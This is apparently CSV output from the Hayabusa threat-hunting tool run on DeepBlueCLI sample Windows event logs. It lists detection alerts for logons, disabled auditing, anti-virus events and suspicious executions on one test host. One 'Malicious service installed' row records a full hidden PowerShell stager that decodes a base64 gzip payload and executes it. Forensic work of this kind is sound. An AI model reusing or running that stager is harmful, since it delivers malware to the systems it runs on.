2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1b293  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1b2fd  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1aae1  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1af2f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
